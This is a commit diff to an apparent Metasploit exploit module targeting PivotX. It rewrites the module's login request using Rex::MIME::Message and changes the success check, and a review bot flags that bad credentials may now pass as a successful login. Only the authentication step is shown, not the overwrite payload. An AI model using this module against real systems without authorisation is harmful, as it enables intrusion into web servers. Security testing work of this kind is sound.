
Commit edfa84e

committed
Uses Rex::MIME::Message instead of manual form-data
1 parent 54c86cf commit edfa84e


1 file changed

+10
-20
lines changed


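--- a/modules/exploits/linux/http/pivotx_index_php_overwrite.rb
+++ b/modules/exploits/linux/http/pivotx_index_php_overwrite.rb
@@ -75,32 +75,22 @@ def check
 end
 
 def login
-boundary = Rex::Text.rand_text_alphanumeric(16).to_s
-
-data_post = "------WebKitFormBoundary#{boundary}\r\n"
-data_post << "Content-Disposition: form-data; name=\"returnto\"\r\n\r\n"
-data_post << "\r\n"
-data_post << "------WebKitFormBoundary#{boundary}\r\n"
-data_post << "Content-Disposition: form-data; name=\"template\"\r\n\r\n"
-data_post << "\r\n"
-data_post << "------WebKitFormBoundary#{boundary}\r\n"
-data_post << "Content-Disposition: form-data; name=\"username\"\r\n\r\n"
-data_post << "#{datastore['USERNAME']}\r\n"
-data_post << "------WebKitFormBoundary#{boundary}\r\n"
-data_post << "Content-Disposition: form-data; name=\"password\"\r\n\r\n"
-data_post << "#{datastore['PASSWORD']}\r\n"
-data_post << "------WebKitFormBoundary#{boundary}\r\n"
-
-res = send_request_cgi!({
+data_post = Rex::MIME::Message.new
+data_post.add_part('', nil, nil, %(form-data; name="returnto"))
+data_post.add_part('', nil, nil, %(form-data; name="template"))
+data_post.add_part(datastore['USERNAME'], nil, nil, %(form-data; name="username"))
+data_post.add_part(datastore['PASSWORD'], nil, nil, %(form-data; name="password"))
+
+res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path, 'pivotx', 'index.php'),
 'vars_get' => { 'page' => 'login' },
-'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}",
-'data' => data_post,
+'ctype' => "multipart/form-data; boundary=#{data_post.bound}",
+'data' => data_post.to_s,
 'keep_cookies' => true
 })
 
-fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless res&.code == 200 && res.body.include?('Dashboard') && !res.body.include?('Incorrect username/password') && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
+fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless (res&.code == 200 || res&.code == 302) && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
 
 @csrf_token = Regexp.last_match(1)
 end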
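Review bot: The rewritten fail_with condition no longer looks at the response body, so a 200 that re-renders the login form with "Incorrect username/password" now counts as success as long as a pivotxsession cookie is present — and if PivotX sets that cookie on every request (as PHP session handling commonly does; not verified here), bad credentials would be reported as a successful login and the later stages would run against an unauthenticated session. Keeping the body checks for the 200 branch while accepting the 302 branch (the reason for dropping send_request_cgi!'s redirect following) preserves the old detection: `logged_in = res&.code == 302 || (res&.code == 200 && res.body.include?('Dashboard') && !res.body.include?('Incorrect username/password'))` followed by `fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless logged_in && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/`. The add_part calls pass nil for content_type and transfer_encoding, which as I read Rex::MIME::Message#add_part is what keeps those headers off plain form fields; a one-line comment above the first call, `# nil content type / transfer encoding: form fields carry only Content-Disposition`, would spare the next reader a trip into Rex.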
